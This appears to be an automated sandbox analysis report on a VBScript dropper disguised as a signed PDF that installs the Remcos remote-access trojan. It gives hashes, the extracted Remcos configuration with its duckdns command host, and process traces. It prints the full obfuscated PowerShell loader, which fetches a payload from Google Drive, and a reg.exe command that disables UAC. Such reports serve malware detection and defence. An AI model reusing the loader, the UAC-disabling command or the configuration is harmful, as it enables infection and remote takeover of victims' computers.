Analysis
-
max time kernel
74s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
29-11-2024 09:11
Static task
static1
Behavioral task
behavioral1
Sample
30180908_signed·pdf.vbs
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
30180908_signed·pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
30180908_signed·pdf.vbs
-
Size
33KB
-
MD5
33788adfb67a0e0bf5a5fe58cb9c5617
-
SHA1
a62c45afa541fdcccc5c97c432c78ce55b0a7a5b
-
SHA256
609aaa35ee7b0582cb3e1e4e9f76d647c98377dac62eca602bf318578b61576f
-
SHA512
9da759eba3eee9ed6d1b804ed8d26f1f59831d49543e393b6adf462343d98dbefabc0314c673b31a4c52857e0d975edbb8304c0e1ee7a375fd71f446ab655a50
-
SSDEEP
768:WuEasaYzR+s1z3NkQpyhZ6d4nl3pVVCStrppuAP:zEasd+a3iQpy/V3/UStF3P
Malware Config
Extracted
remcos
RemoteHost
8766e34g8.duckdns.org:3782
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-93TSMD
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Blocklisted process makes network request 15 IoCs
flow pid Process 3 2412 WScript.exe 7 2828 powershell.exe 9 2828 powershell.exe 11 1632 msiexec.exe 13 1632 msiexec.exe 15 1632 msiexec.exe 17 1632 msiexec.exe 18 1632 msiexec.exe 20 1632 msiexec.exe 22 1632 msiexec.exe 23 1632 msiexec.exe 24 1632 msiexec.exe 25 1632 msiexec.exe 26 1632 msiexec.exe 27 1632 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 drive.google.com 7 drive.google.com 11 drive.google.com -
pid Process 2828 powershell.exe 1892 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\msiexec.exe msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1632 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1892 powershell.exe 1632 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2004 reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2828 powershell.exe 1892 powershell.exe 1892 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1632 msiexec.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2412 wrote to memory of 2828 2412 WScript.exe 30 PID 2412 wrote to memory of 2828 2412 WScript.exe 30 PID 2412 wrote to memory of 2828 2412 WScript.exe 30 PID 1892 wrote to memory of 1632 1892 powershell.exe 35 PID 1892 wrote to memory of 1632 1892 powershell.exe 35 PID 1892 wrote to memory of 1632 1892 powershell.exe 35 PID 1892 wrote to memory of 1632 1892 powershell.exe 35 PID 1892 wrote to memory of 1632 1892 powershell.exe 35 PID 1892 wrote to memory of 1632 1892 powershell.exe 35 PID 1892 wrote to memory of 1632 1892 powershell.exe 35 PID 1892 wrote to memory of 1632 1892 powershell.exe 35 PID 1632 wrote to memory of 1140 1632 msiexec.exe 37 PID 1632 wrote to memory of 1140 1632 msiexec.exe 37 PID 1632 wrote to memory of 1140 1632 msiexec.exe 37 PID 1632 wrote to memory of 1140 1632 msiexec.exe 37 PID 1140 wrote to memory of 2004 1140 cmd.exe 39 PID 1140 wrote to memory of 2004 1140 cmd.exe 39 PID 1140 wrote to memory of 2004 1140 cmd.exe 39 PID 1140 wrote to memory of 2004 1140 cmd.exe 39 PID 1632 wrote to memory of 1212 1632 msiexec.exe 40 PID 1632 wrote to memory of 1212 1632 msiexec.exe 40 PID 1632 wrote to memory of 1212 1632 msiexec.exe 40 PID 1632 wrote to memory of 1212 1632 msiexec.exe 40
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30180908_signed·pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"2⤵
- Blocklisted process makes network request
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2004
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hajp.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:1212
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5502902ac857593ef9f802af36ff2f4e0
SHA1d6b2b0b6db70c4640a61c0932f5c4c988c49a42a
SHA2568584ce7e463081b8efb2dc0f1246f1066795f1e369ec54557e5411c6e3fdd345
SHA512afed389099833f5e97ac574082c790a878272aeb67720486a7fff6ac5fff3ae4552d068782d79f23a357bd27e4e8a87bd946a9b845781d381b8c6bca50515ab6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e9da233828dfc5f5bf0bb0b201fc775c
SHA15ef6d9a16f7630c8a71daeab70bb55dd691171e1
SHA256b5dc0ac24c8ee9f8e6fd20908b8008017a1289742730557eadfe326149898aa0
SHA512667ebdbcd0eba0a6b523d973151b3c73657655673406b8ecf82c63d29fd90c1ca7168bc5ddd4d1f4ccdec20da5aa1b80784034bb2587c5b74112dc4eacde5389
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
444B
MD54b2f14d56e3b1d19e66cc4519963222b
SHA1a9770866be3d2badf4c5254e00d1e6b80f8a4daf
SHA256b3e0b95d4fe506afd4f8851a60dd6793cda5ad3ba0d7eee440c53f6bd987e23b
SHA512b9f0568ea04cb89c1cdf4b88d43b2ff68260f58c078df33fbde1d57ba2301a909a025728635a7497c76bb0c4b3dfa85fe60d63649fd042e745d21be77ed7fae6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QODPE21NVZ6RA2K7AESP.temp
Filesize7KB
MD537926af74b5349d1ec3d83d98d3fb809
SHA16e9521883ac2b974ccc85d11bc00f65ee8233cfb
SHA2561775adee92e15f252c21c4acef85e05ebccc4da0fdf06c3ca5e7ff0a87732daa
SHA512648851611bf85a149df758548a8623b1967b11875698f9146739d8219a6325ab3601f56aa39e67a3145a7892b6ab75a324ace51b37d7b97918e045e88d7cdb1c
-
Filesize
426KB
MD58a3cfa45f3daf3318ee35fbc24637ccd
SHA1a4a2f7a664f7839ede5e3a38cd303c50ac4db90d
SHA25613345dbc875ba768cb21aadf3b3127c0cd7b9278f1460f8bac7b2c382ac6bc6d
SHA512a35d23894c58a3613fee2426974a2626ecdc410d254055a3a704f03ed54f64162bde5be672c4f706039f810e125610fb62ed941df6f4f4fa51ba9da12299e111